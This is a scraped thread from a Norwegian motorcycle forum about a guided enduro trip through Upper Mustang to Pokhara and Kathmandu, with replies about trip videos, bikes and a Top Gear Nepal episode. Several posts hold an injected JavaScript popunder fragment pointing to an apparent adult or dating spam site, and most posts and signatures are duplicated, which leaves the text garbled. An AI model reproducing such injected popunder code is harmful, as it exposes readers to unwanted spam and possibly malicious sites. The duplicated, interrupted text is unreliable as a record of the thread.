Himalaya - Upper Mustang Nepal
Re: Himalaya - Upper Mustang Nepal
7. (Og siste) kjøredag, Kagbeni-Pokhara
Dette skulle vært nest siste dag men guiden mente vi holdt såpass bra tempo at vi kunne klare de siste 2 dagene på én hvis vi ville. Måtte da droppe stopp ved varme kilder og bading der men ga oss mulighet til å være turist i Kathmandu dagen etter. Så da gjorde vi det. Ikke så mye bilder fra denne dagen, delvis fordi kom oppover denne veien første 2 dagene (med en del omveier/avstikkere) så allerede tatt bildene vi trengte, delvis fordi var busy med å kjøre og delvis fordi mindre spektakulært enn høyere opp.
Men jeg hadde det moro jeg, liker å kjøre MC og hadde bra flyt. Første tredel var på rufsete vei men en del trafikk, som å kjøre på (enkel) crossbane med trafikk Så bedre grusvei, kanskje ikke så spennende, og så på asfalt siste tredelen med mye trafikk...men street racing har vi litt erfaring med så det var moro det også
Litt småspennende innimellom med 700m rett ned (hvor 700m ikke må tolkes helt bokstavelig = skikkelig høyt men mindre enn 1000m) på siden mens kjører slalåm mellom bilene
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Vel fremme var stemningen høy og humøret på topp Og på kvelden var vi ute og spiste med guiden Prabin, mekaniker Surja og Bishnu som jobber på kontoret hos H&T og er gift med Prabin.
Stor takk til særlig Prabin og Surja (på bilder under) men også gutta i følgebil samt Matt og Bishnu som hjalp med alt det praktiske før og under turen, alle har sin del av æren for en helt utrolig tur, virkelig "Once in a Lifetime experience"
Da bare litt bilder fra Katmandu som gjenstår...kommer straks SÅ er jeg ferdig
Dette skulle vært nest siste dag men guiden mente vi holdt såpass bra tempo at vi kunne klare de siste 2 dagene på én hvis vi ville. Måtte da droppe stopp ved varme kilder og bading der men ga oss mulighet til å være turist i Kathmandu dagen etter. Så da gjorde vi det. Ikke så mye bilder fra denne dagen, delvis fordi kom oppover denne veien første 2 dagene (med en del omveier/avstikkere) så allerede tatt bildene vi trengte, delvis fordi var busy med å kjøre og delvis fordi mindre spektakulært enn høyere opp.
Men jeg hadde det moro jeg, liker å kjøre MC og hadde bra flyt. Første tredel var på rufsete vei men en del trafikk, som å kjøre på (enkel) crossbane med trafikk Så bedre grusvei, kanskje ikke så spennende, og så på asfalt siste tredelen med mye trafikk...men street racing har vi litt erfaring med så det var moro det også
Litt småspennende innimellom med 700m rett ned (hvor 700m ikke må tolkes helt bokstavelig = skikkelig høyt men mindre enn 1000m) på siden mens kjører slalåm mellom bilene
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Vel fremme var stemningen høy og humøret på topp Og på kvelden var vi ute og spiste med guiden Prabin, mekaniker Surja og Bishnu som jobber på kontoret hos H&T og er gift med Prabin.
Stor takk til særlig Prabin og Surja (på bilder under) men også gutta i følgebil samt Matt og Bishnu som hjalp med alt det praktiske før og under turen, alle har sin del av æren for en helt utrolig tur, virkelig "Once in a Lifetime experience"
Da bare litt bilder fra Katmandu som gjenstår...kommer straks SÅ er jeg ferdig
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
Re: Himalaya - Upper Mustang Nepal
Katmandu
Booket om lokalfly så dro lørdag morgen til Katmandu. Fikk dyttet 5 mann (2 dro neste dag) med bagasje inn i verdens minste varebil ved ankomst (mini-maxitaxi?)
Etter innsjekking tok vi taxi til apetempelet på høyde i byen og levde opp til navnet, mysset med aper, men også mye annet å se på:
Så delte vi oss litt, noen gikk for å se på kortesjen med kinesiske presidenten som landet samme dag, men jeg og en til dro til Durbar square, det gamle kongelige palasset i det tidligere Kathmandu Kingdom. Men fakstisk vel så artig å gå dit gjennom masse trange gater med 1000 små butikker og markeder, masse lyder, lukter og synsinntrykk, følte fikk sett det virkelige Katmandu.
Så på søndag var det ubønnhørlig slutt...men fikk da siste kikk på Himalaya fra flyvinduet
Booket om lokalfly så dro lørdag morgen til Katmandu. Fikk dyttet 5 mann (2 dro neste dag) med bagasje inn i verdens minste varebil ved ankomst (mini-maxitaxi?)
Etter innsjekking tok vi taxi til apetempelet på høyde i byen og levde opp til navnet, mysset med aper, men også mye annet å se på:
Så delte vi oss litt, noen gikk for å se på kortesjen med kinesiske presidenten som landet samme dag, men jeg og en til dro til Durbar square, det gamle kongelige palasset i det tidligere Kathmandu Kingdom. Men fakstisk vel så artig å gå dit gjennom masse trange gater med 1000 små butikker og markeder, masse lyder, lukter og synsinntrykk, følte fikk sett det virkelige Katmandu.
Så på søndag var det ubønnhørlig slutt...men fikk da siste kikk på Himalaya fra flyvinduet
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
Re: Himalaya - Upper Mustang Nepal
Igjen; fantastisk. Tusen takk!
Re: Himalaya - Upper Mustang Nepal
Ser ut som dere har hatt en knallfin tur. Fine bilder som beskriver spektakulære opplevelser
Re: Himalaya - Upper Mustang Nepal
Mange takk Håper å komme med video fra turen etter hvert
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
- AJ
- Administrator
- Innlegg: 37980
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Himalaya - Upper Mustang Nepal
Video, ja !
Det ser vi fram til !
Takker så langt for fantastisk bra turreferat !
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: Himalaya - Upper Mustang Nepal
Så vidt begynt å redigere egen video fra turen men en av de andre gutta var kjappere enn meg Nokså lang så kanskje mest for oss som var med på turen men er jo frivillig om og hvor mye man vil se av videoen
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
Re: Himalaya - Upper Mustang Nepal
Ser ut som en knall mc tur. Mye stein i veiene ser det ut til på filmen!
Selv om jeg liker best høyhastighets svinger på strøken asfalt, så kunne dette vært en fin opplevelse på «to do and bin there» listen
Sent from my iPhone using Tapatalk
Selv om jeg liker best høyhastighets svinger på strøken asfalt, så kunne dette vært en fin opplevelse på «to do and bin there» listen
Sent from my iPhone using Tapatalk
Re: Himalaya - Upper Mustang Nepal
Er en del stein Himalaya, ikke til å komme bort fra det Demperne tar heldigvis unna det grøvste selv om Kina har litt å lære av KTM.KawaKjetil skrev: ↑02 jan 2020, 00:57 Ser ut som en knall mc tur. Mye stein i veiene ser det ut til på filmen!
Selv om jeg liker best høyhastighets svinger på strøken asfalt, så kunne dette vært en fin opplevelse på «to do and bin there» listen
Ingenting slår fine svinger på bra asfalt, måtte jeg velge mellom enduro og asfalt hadde det blitt asfalt
Pleier å sammenligne enduro og gatekjøring med slalåm og langrenn. Er litt det samme, begge deler er på snø med ski og staver og har man gått en del på langrenn så fikser man slalåm mye enklere enn en som ikke har stått på ski før. Samme med enduro, en erfaren gatesjåfør vil fikse moderat enduro ganske greit, alt er jo der du er vant til. Men likevel 2 forskjellige ting som dekker forskjellige behov. Hovedgrunnen min til å begynn med offroad var nettopp for å kunne dra på slike turer som dette
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
Re: Himalaya - Upper Mustang Nepal
Kjørte en GSA i 6 år Den var for stor og uhamstelig til å ha det gøy på grus. Men et bra frakte esel, det skal den ha Sikkert noen som ikke liker høre det, men for meg ble det for tamt. Uansett var det GSA så langt øyet kunne se på feks Adventuredays i Sverige da jeg prøvde det første året.pingvin skrev: ↑02 jan 2020, 14:30Er en del stein Himalaya, ikke til å komme bort fra det Demperne tar heldigvis unna det grøvste selv om Kina har litt å lære av KTM.KawaKjetil skrev: ↑02 jan 2020, 00:57 Ser ut som en knall mc tur. Mye stein i veiene ser det ut til på filmen!
Selv om jeg liker best høyhastighets svinger på strøken asfalt, så kunne dette vært en fin opplevelse på «to do and bin there» listen
Ingenting slår fine svinger på bra asfalt, måtte jeg velge mellom enduro og asfalt hadde det blitt asfalt
Pleier å sammenligne enduro og gatekjøring med slalåm og langrenn. Er litt det samme, begge deler er på snø med ski og staver og har man gått en del på langrenn så fikser man slalåm mye enklere enn en som ikke har stått på ski før. Samme med enduro, en erfaren gatesjåfør vil fikse moderat enduro ganske greit, alt er jo der du er vant til. Men likevel 2 forskjellige ting som dekker forskjellige behov. Hovedgrunnen min til å begynn med offroad var nettopp for å kunne dra på slike turer som dette
Kanskje jeg en dag finner ut at jeg vil kjøre en lettere og kvikkere enduro, Jeg tror det hadde vært morro
Re: Himalaya - Upper Mustang Nepal
Kunne gjennomført turen med GSA men ville droppet en del av avstikkerne (som ikke ville vært foruten, f.eks. helt umulig å kommet opp på 5000moh). Men greit med liten sykkel også på noen av "hovedveiene" der smalt, løst og 400m rett ned uten rekkverk
Også en av de andre gutta fikk video ferdig nå så fikk sparket bak til å snekre sammen egen omsider. Siden de andre 2 laget litt lengre videoer så gjorde jeg en vri å laget et veldig KORT video, 1 uke kondensert ned til 3 minutter
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Også en av de andre gutta fikk video ferdig nå så fikk sparket bak til å snekre sammen egen omsider. Siden de andre 2 laget litt lengre videoer så gjorde jeg en vri å laget et veldig KORT video, 1 uke kondensert ned til 3 minutter
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
Re: Himalaya - Upper Mustang Nepal
Ser fantastisk ut, må definitivt komme meg på en sånn tur en gang!
:)
:)
Re: Himalaya - Upper Mustang Nepal
Lever visstnok bare en gang og vet aldri hvor lenge helsa holder (passert 50) så jobber meg gjennom bucket lista (som blir lengre og lengre så går egentlig feil vei ). IOM TT nå i juni og Mongolia neste år er de neste større turene som er banket
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
Re: Himalaya - Upper Mustang Nepal
Top Gear: Nepal Special
Top Gear har vært i Nepal og kjørt samme rute som vi tok opp til Lo Manthang, masse steder kjenner igjen fra turen vår (litt pussig de ikke dro til grensen mot Kina/Tibet når de først var så langt, bare par timer på ganske bra vei). Dvs. vi fløy fra Kathmandu til Pokhara så slapp hovedveien med crazy trafikk som vist i begynnelsen av programmet. Og vi kjørte jo masse avstikkere og alternative veier de ikke kunne ta med Peugot 106 og Renault 4.
Om du har Altibox, gå på "Programarkiv", velg "BBC Brit" og søk på "Nepal". De er ikke like morsomme som May, Hammond og Clarkson (selv om de prøver) men artig å gjennoppleve turen og selvfølgelig masse fine bilder med drone etc. Også på Amazone for de som har det ser jeg. Går forøvrig kl22:30 på BBC Brit i kveld.
Top Gear har vært i Nepal og kjørt samme rute som vi tok opp til Lo Manthang, masse steder kjenner igjen fra turen vår (litt pussig de ikke dro til grensen mot Kina/Tibet når de først var så langt, bare par timer på ganske bra vei). Dvs. vi fløy fra Kathmandu til Pokhara så slapp hovedveien med crazy trafikk som vist i begynnelsen av programmet. Og vi kjørte jo masse avstikkere og alternative veier de ikke kunne ta med Peugot 106 og Renault 4.
Om du har Altibox, gå på "Programarkiv", velg "BBC Brit" og søk på "Nepal". De er ikke like morsomme som May, Hammond og Clarkson (selv om de prøver) men artig å gjennoppleve turen og selvfølgelig masse fine bilder med drone etc. Også på Amazone for de som har det ser jeg. Går forøvrig kl22:30 på BBC Brit i kveld.
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days